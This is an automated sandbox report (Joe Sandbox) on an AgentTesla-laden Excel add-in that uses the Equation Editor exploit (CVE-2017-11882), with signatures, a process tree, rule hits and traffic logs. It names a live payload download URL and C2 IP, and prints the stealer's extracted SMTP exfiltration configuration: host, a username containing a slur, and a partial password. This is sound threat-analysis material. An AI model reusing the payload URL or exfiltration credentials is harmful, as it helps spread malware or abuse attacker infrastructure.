Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nova naredba_HR-WJO-12-10-2024.xlam.xlsx

Overview

General Information

Sample name:Nova naredba_HR-WJO-12-10-2024.xlam.xlsx
Analysis ID:1572388
MD5:80422f16531f8c43944e04bf3538efdf
SHA1:f137aa50426c79fa8645d6bfc2610a98cf2c4fa3
SHA256:971e2daca5513d707e83bc64690d35a29a7c27d02fa0f1dce8b6694e79b9a65c
Tags:xlamxlsxuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3400 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3608 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • ghxtg8op.exe (PID: 3752 cmdline: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe MD5: EF05B0557B2C8F0C951A1B21B812E75F)
        • RegSvcs.exe (PID: 3788 cmdline: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabown22jan2024@worlorderbillions.top", "Password": "3^?r?mtxk(kt               "}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x679c:$s1: <legacyDrawing r:id="
  • 0x67c4:$s2: <oleObject progId="
  • 0x680c:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
          • 0x334fb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
          • 0x3356d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
          • 0x335f7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
          • 0x33689:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
          • 0x336f3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
          • 0x33765:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
          • 0x337fb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
          • 0x3388b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
          Click to see the 5 entries
          SourceRuleDescriptionAuthorStrings
          5.2.ghxtg8op.exe.d00000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.ghxtg8op.exe.d00000.0.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.ghxtg8op.exe.d00000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
              • 0x334fb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
              • 0x3356d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
              • 0x335f7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
              • 0x33689:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
              • 0x336f3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
              • 0x33765:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
              • 0x337fb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
              • 0x3388b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
              6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 4 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 190.90.160.170, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3608, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3608, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3608, Protocol: tcp, SourceIp: 190.90.160.170, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3608, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ProcessId: 3752, ProcessName: ghxtg8op.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3608, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ProcessId: 3752, ProcessName: ghxtg8op.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ParentImage: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ParentProcessId: 3752, ParentProcessName: ghxtg8op.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe, ProcessId: 3788, ProcessName: RegSvcs.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3608, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsxAvira: detected
                  Source: http://aquafusion.com.co/ngbx/ngown.exeAvira URL Cloud: Label: malware
                  Source: 6.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabown22jan2024@worlorderbillions.top", "Password": "3^?r?mtxk(kt "}
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsxReversingLabs: Detection: 65%
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 190.90.160.170 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: wntdll.pdb source: ghxtg8op.exe, 00000005.00000003.485569970.0000000002980000.00000004.00001000.00020000.00000000.sdmp, ghxtg8op.exe, 00000005.00000003.485229228.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00DA445A
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAC6D1 FindFirstFileW,FindClose,5_2_00DAC6D1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00DAC75C
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00DAEF95
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00DAF0F2
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DAF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00DAF3F3
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00DA37EF
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DA3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00DA3B12
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exeCode function: 5_2_00DABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00DABCBC

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560540 WinExec,ExitProcess,2_2_03560540
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035604F5 URLDownloadToFileW,2_2_035604F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0356047A LoadLibraryW,URLDownloadToFileW,2_2_0356047A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035603CF ExitProcess,2_2_035603CF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560560 ExitProcess,2_2_03560560
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035603E8 URLDownloadToFileW,2_2_035603E8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560494 URLDownloadToFileW,2_2_03560494
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03560404 URLDownloadToFileW,2_2_03560404
                  Source: global trafficDNS query: name: aquafusion.com.co
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49165
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
                      Connection: Keep-Alive
                      Keep-Alive: timeout=5, max=100
                      content-type: application/x-msdownload
                      last-modified: Tue, 10 Dec 2024 07:12:19 GMT
                      accept-ranges: bytes
                      content-length: 1051136
                      date: Tue, 10 Dec 2024 13:20:52 GMT
                      server: LiteSpeed
